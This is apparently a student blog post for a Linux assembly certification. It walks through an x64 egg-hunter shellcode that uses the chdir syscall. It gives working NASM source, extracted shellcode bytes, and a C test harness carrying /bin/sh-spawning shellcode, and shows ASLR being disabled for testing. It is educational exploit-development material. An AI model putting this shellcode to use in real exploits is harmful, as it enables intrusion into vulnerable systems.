This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:
https://www.pentesteracademy.com/course?id=7
Student ID: PA-30398
The files for this assignment are:
Now comes the question: what is an Egg Hunter
?
According to a paper titled [Egg Hunter - A twist in Buffer Overflow](https://www.exploit-db.com/docs/english/18482-egg-hunter---a-twist-in-buffer-overflow.pdf)
published by Ashfaq Ansari on Exploit-DB
:
The Egg hunting technique is used when there are not enough available consecutive memory locations to insert the shellcode. Instead, a unique "tag" is prefixed with shellcode.
When the "Egg hunter" shellcode is executed, it searches for the unique "tag" that was prefixed with the large payload and starts the execution of the payload.
To implement an egg-hunter for x64 Linux systems, I'm referring to the same whitepaper I used for the previous SLAE32 exam. It shows some techniques you can employ in your own implementation.
Since the SIGSEGV handler technique
is considered infeasible
mainly due to its size, I decided to use instead the system call technique.
As the name implies, it's based on the usage of system calls to scan the memory of the process in search of the so-called egg
.
Given the fact that size is very important in egg-hunter shellcodes, we would need syscalls that do not require complex data structures. The best case is a idempotent
syscall that accepts a single pointer argument.
For this reason, I performed some grep searches on the man pages installed on my system, and I discovered a few matches:
# Requirements:
- sudo apt install manpages-dev
- sudo find /usr/share/man2/ -type f -name "*.gz" -exec sh -c "gunzip {}" \;
- cd /usr/share/man2
grep -RiE '\(const char\s*?\*"\s[a-zA-Z]*\s*\)'
# chroot.2:.BI "int chroot(const char *" path );
# unlink.2:.BI "int unlink(const char *" pathname );
# delete_module.2:.BI " int delete_module(const char *" name );
# umount.2:.BI "int umount(const char *" target );
# rmdir.2:.BI "int rmdir(const char *" pathname );
# acct.2:.BI "int acct(const char *" filename );
# chdir.2:.BI "int chdir(const char *" path );
# swapon.2:.BI "int swapoff(const char *" path );
# uselib.2:.BI "int uselib(const char *" library );
Theoretically, all of them should allow me to test whether a given memory address is valid.
However, I chose to use the syscall chdir
, since it wouldn't cause too many changes to the program as compared to unlink
and rmdir
which seem far more dangerous.
Follows the function prototype of the syscall chdir
:
#include <unistd.h>
int chdir(const char *path);
As you can see, it accept a single pointer argument.
All it does is try to change the Current Working Directory
(CWD
) to the path the argument path
points to.
Since it accepts a pointer, we can use it to test memory addresses.
Moreover, given that it already implements a SIGSEGV handler
, the syscall won't throw a SIGSEGV
error and crash the program.
Instead, it will return the error EFAULT
(0xfffffff2
), indicating that a bad address was passed as the argument of the syscall.
Follows my implementation in Assembly language:
; Author: Robert Catalin Raducioiu
global _start
section .text
_start:
; start searching for the egg from the address 0x0
xor edi, edi
NextPage:
; go to the next memory page (each one is 0x1000 bytes)
or di, 0xfff
; go to the next memory address
inc rdi
CheckAddress:
; call the syscall 80 (chdir)
xor eax, eax
mov al, 80
syscall
; check if the last byte of RAX is equal to the last byte
; of the error EFAULT (0xfffffff2)
cmp al, 0xf2
jz NextPage
; set EAX to the egg
mov eax, 0x74636273
dec eax
; compare the egg with the bytes pointed to by RDI
; also increase RDI by 4
scasd
; if it is not the egg, then go back and check the next address
jnz CheckAddress
; jump at the beginning of the actual shellcode
call rdi
Note that the CheckBytes
routine does not contain an exact copy of the egg, however it's slightly modified, in this case the last byte is increased by 0x1
.
Therefore, in order to calculate the real egg, it uses the assembly instruction DEC
to decrease the value of the modified egg.
This was done to avoid another exact occurrence of the egg, which could lead to the egg hunter finding the latter instead of the egg prepended to the shellcode.
To obtain the shellcode from the previous assembly program, you can use these instructions:
nasm -f elf64 egghunter.nasm
objcopy -O binary -j .text egghunter.o /dev/stdout | od -An -t x1 | tr -d '\n' | sed -r 's/^ |$/"/g;s/\s?([0-9a-f]{2})/\\x\1/g'
# Result:
# "\x31\xff\x48\xf7\xe7\x66\x81\xcf\xff\x0f\x48\xff\xc7\x31\xc0\xb0\x50\x0f\x05\x3c\xf2\x74\xee\x8b\x17\xbe\x73\x62\x63\x74\xff\xce\x39\xf2\x75\xe6\x48\x83\xc7\x04\xff\xd7"
During my tests, I noticed that a long period of time was required for the egg hunter to find the egg and execute the real shellcode. This is caused by the usage of 64-bits memory addresses.
In fact, while most of the x86 systems have 32 bits for virtual addresses, x86-64 systems have 48 bits.
System | Number of memory pages |
---|---|
x86 | 2^32 / 0x1000 = 1.048.576 |
x86-64 | 2^48 / 0x1000 = 68.719.476.736 |
From the table above, we can see that it takes 68.000 more times to scan all the virtual addresses in a x86-64 process.
Time-wise, to find an egg in a 64-bit process I would have to wait more than 10 hours, while it would take some seconds/minutes in 32-bit processes.
For testing purposes, I chose to speed up the process by starting from an address closer to the location of the real shellcode.
To do this, first I had to disable ASRL (Address Space Layout Randomization
) on my Linux host:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# to enable it again:
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
After that, I wrote a simple C program to test the egghunter shellcode:
#include <stdio.h>
#include <string.h>
#define EGG "\x72\x62\x63\x74"
void main(int argc, char* argv[])
{
/*
Shellcode for spawning /bin/sh, with the egg prepended
*/
unsigned char shellcode[] = EGG "\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x83\xc0\x3b\x0f\x05";
unsigned char egghunter[] = "\x31\xff\x48\xf7\xe7\x66\x81\xcf\xff\x0f\x48\xff\xc7\x31\xc0\xb0\x50\x0f\x05\x3c\xf2\x74\xee\x8b\x17\xbe\x73\x62\x63\x74\xff\xce\x39\xf2\x75\xe6\x48\x83\xc7\x04\xff\xd7";
printf("[+] Shellcode length: %d\n", strlen(shellcode));
printf("[+] Egg-hunter length: %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}
Next, I compiled it with gcc:
gcc -w -o test_egghunter -zexecstack ./test_egghunter.c
As previously assumed, once I ran the program, it didn't spawn a shell, but it would require many hours of time.
Since the real shellcode is stored on the stack (hence a local variable within the main function), I decided to retrieve the starting address of the stack and increase the RDI
register of the egghunter shellcode by this value.
Doing so, the testing program would be able to find the egg, and execute the real shellcode in a matter of seconds.
First things first, to retrieve the starting address of the stack I ran the commands below while the testing program was still running:
# get the PID of the testing program
ps aux | grep test_egghunter
# kali 21105 98.6 0.0 2424 680 pts/1 R+ 05:47 0:38 ./test_egghunter
# get the base address of the stack
cat /proc/21105/maps
# 7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
After that, I added the following line to the NASM program:
--- egghunter.nasm 2022-06-26 08:42:28.986705942 -0400
+++ egghunter_fast.nasm 2022-06-26 08:42:35.690706235 -0400
@@ -8,6 +8,7 @@
; start searching for the egg from the address 0x0
xor edi, edi
+ mov rdi, 0x7fffffff0000
NextPage:
Running again the testing program with the new egghunter shellcode, the latter successfully found the egg, and passed the execution to the real shellcode, which spawned a simple /bin/sh
shell.
The following figure demonstrates the result: